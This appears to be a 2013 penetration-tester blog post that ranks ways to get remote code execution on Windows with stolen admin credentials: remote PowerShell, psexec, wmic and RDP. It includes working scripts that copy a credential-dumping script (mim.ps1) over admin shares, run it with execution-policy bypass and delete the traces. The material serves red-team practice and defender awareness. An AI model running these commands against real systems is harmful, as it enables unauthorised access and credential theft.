Code Execution (Post Exploit) Order of Operations
November 1, 2013 Leave a comment
[quick post this month, probably lower quality than usual because I’m traveling in china and writing this on a bus]
With a cleartext windows admin password in hand, there are of course multiple ways to execute code. How do other pentesters do this? If you do it differently than I do, what’s your motivation? This isn’t rhetorical – I hope both of you who read this blog let me know :)
In general, I try not to stay too rigid. In my opinion, it’s best to mimic how real operations folks operate. That said, I do have an order of preferred ways to execute remote code. Any of these could potentially be audited as a “we’re pwned” event for a blue team, but some are inherently noisier than others.
1. Remote powershell
This seems to be the most sneaky method. First, if remote powershell is enabled, people are probably using it, so you using it may not stand out. Further, if you code without using .net fragments, nothing is written to disk at all – it’s all in memory (caveat is if you compile C# in your powershell it will write artifacts to disk). If port 5985/5986 is open, this is a good bet.
$comm = {Invoke-Portscan -Hosts 192.168.1.1/24 -SkipDiscovery -noProgressMeter -Ports 443} $secpasswd = ConvertTo-SecureString "Password" -AsPlainText -Force $mycreds = New-Object System.Management.Automation.PSCredential ("DOMAIN\muser", $secpasswd) Invoke-Command -ComputerName mcomputer -Credential $mycreds -ScriptBlock $comm
2. powershell over psexec
This starts a service as system (usually), which can be noisy. Additionally, you often want to execute your own thing, which will require you to upload it to the box you’re attacking. But that said, psexec is also a common real administration method. I often find psexec already installed on many utility boxes. If port 445 is open, this is usually the method I try next – uploading a powershell script to the server and then executing it with psexec.
#powershell over psexec #psexec has the -c option for copying executables, but doesn't work with scripts like this as well #(because powershell.exe is the executable) $servername = "192.168.137.100" $username = "192.168.137.100\Administrator" $password = "password" $LocalOutFile = "out.txt" $LocalPS = "mim.ps1" $psFile = "10982124.ps1" net use q: \\$servername\c$\Windows\Temp /user:$username $password | Out-Null copy $LocalPS q:\$psFile & cmd /c echo "." | psexec.exe /accepteula -u $username -p $password \\$servername powershell -executionpolicy bypass c:\Windows\Temp\$psFile >> "out.txt" 2>&1 del q:\$psFile net use q: /delete | Out-Null
3. powershell over wmic
Even if you’re an admin on the box and you can reach port 445, psexec can be effectively disabled, for example if the ADMIN$ share is not set (i.e. you can see this access denied when admin$ is requested in a packet dump, and you can also see it in the registry at HKLM:Software\MicroSoft\Windows\CurrentVerision\Policies\System\LocalAccountTokenFilterPolicy). Anyway, if psexec and remote powershell both aren’t options, wmic has always come through for me.
$servername = "192.168.137.100" $username = "192.168.137.100\Administrator" $password = "password" $LocalOutFile = "out.txt" $LocalPS = "mim.ps1" $psFile = "10982124.ps1" $outFile = "99120997.nss" #copy .ps1 to the remote server net use q: \\$servername\c$\Windows\Temp /user:$username $password | Out-Null copy $LocalPS q:\$psFile #redirect output to a file on the remote server wmic /user:$username /password:$password /node:$servername PROCESS call create "powershell -executionpolicy bypass c:\Windows\Temp\$psFile >> c:\Windows\Temp\$outFile" #wait for execution to finish sleep 30 #copy output back and cleanup del q:\$psFile copy q:\$outfile out.txt del q:\$outFile net use q: /delete | Out-Null
4. RDP
I’ve never HAD to use RDP, and it’s super noisy, but some things are easier with a desktop. I usually try to avoid this if I can, but especially if remote powershell isn’t enabled and 3389 is open, I’ll sometimes just go straight for RDP.
In addition to the four methods I mention above (remote ps, psexec, wmic, and RDP) there are a few other ways, at least including AT, dropping files in specific places, etc. But I can almost always get the code execution I want with above.